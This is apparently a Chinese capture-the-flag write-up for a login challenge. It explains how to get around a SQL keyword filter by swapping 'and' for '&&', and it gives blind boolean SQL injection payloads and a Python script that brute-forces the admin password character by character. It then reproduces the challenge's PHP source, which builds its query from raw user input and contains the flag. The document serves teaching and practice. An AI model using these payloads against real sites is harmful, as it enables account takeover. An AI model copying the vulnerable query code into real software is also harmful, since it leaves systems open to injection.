打开题目,看到是让登录,查看网页源码可以发现一个hint
<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->
这道题过滤的字符比较多
$filter = "mid|substr|*|s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp"; 以及空格
根据提示可以猜到是要找到admin的密码。
and被过滤了可以用%26%26 (&&)替换
所以可以构造payload user=admin'%26%26length(pass)='1&pass=1 先来确定密码的长度
可以用脚本跑.....也可以手动...
确定好密码长度后,再来构造playload来爆破密码
user=admin'%26%26left(pass,1)='0&pass=1
附上py脚本
import requests
def getlen(url):
i=1;
while 1:
payload={'user':"admin'&&length(pass)='%d"%(i),'pass':'123456'}
#print payload
reponse=requests.post(url,payload)
text=reponse.content
#print text
if text.find("password error!")!=-1:
break
else:
i=i+1
return i
def getpwd(url,len,list):
ch=""
for i in range(1,len+1):
for c in list:
payload={'user':"admin'&&left(pass,%d)='%s"%(i,ch+c),'pass':'123456'}
reponse=requests.post(url,payload)
#print payload
text=reponse.content
#print text
if text.find("password error!")!=-1:
ch=ch+c
print (ch)
break
else:
pass
if __name__=='__main__':
list=[]
for i in range(10):
list.append(str(i))
'''
for i in range(65,91):
list.append(chr(i))
'''
for i in range(97,123):
list.append(chr(i))
url="http://"
len=getlen(url)
print (len)
getpwd(url,len,list)
LEFT(string, number_of_chars)
LEFT()函数从字符串中提取多个字符(从左开始)。
附上php源码
<?php
//sql注入绕过,
error_reporting(0);
if (!isset($_POST['user']) || !isset($_POST['pass'])) {
?>
<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<title>Fullscreen Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- CSS -->
<link rel='stylesheet' href='http://fonts.googleapis.com/css?family=PT+Sans:400,700'>
<link rel="stylesheet" href="assets/css/reset.css">
<link rel="stylesheet" href="assets/css/supersized.css">
<link rel="stylesheet" href="assets/css/style.css">
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<div class="page-container">
<h1>Login</h1>
<form action="" method="post">
<input type="text" name="user" class="username" placeholder="Username">
<input type="password" name="pass" class="password" placeholder="Password">
<button type="submit">Sign in</button>
<div class="error"><span>+</span></div>
</form>
</div>
<!-- Javascript -->
<script src="assets/js/jquery-1.8.2.min.js"></script>
<script src="assets/js/supersized.3.2.7.min.js"></script>
<script src="assets/js/supersized-init.js"></script>
<script src="assets/js/scripts.js"></script>
</body>
</html>
<?php
echo '<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->'."<br/>";
die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
if (is_array($StrValue)){
$StrValue=implode($StrValue);
}
if (preg_match("/".$ArrReq."/is",$StrValue)==1){
print "naive";
exit();
}
}
$filter = "mid|substr|*|s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp";
foreach($_POST as $key=>$value){
AttackFilter($key,$value,$filter);
}
$con = mysql_connect("localhost","帐号","密码");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="ctf";
mysql_select_db($db, $con);
$sql="SELECT * FROM ctfinterest WHERE user = '{$_POST['user']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$key = mysql_fetch_array($query);
if($key['pass'] == $_POST['pass']) {
print "Flag{0f_C0urse_Y0u_C4n_D0_1t!}";
}else{
print "password error!";
}
}else{
print "no such user!";
}
mysql_close($con);
?>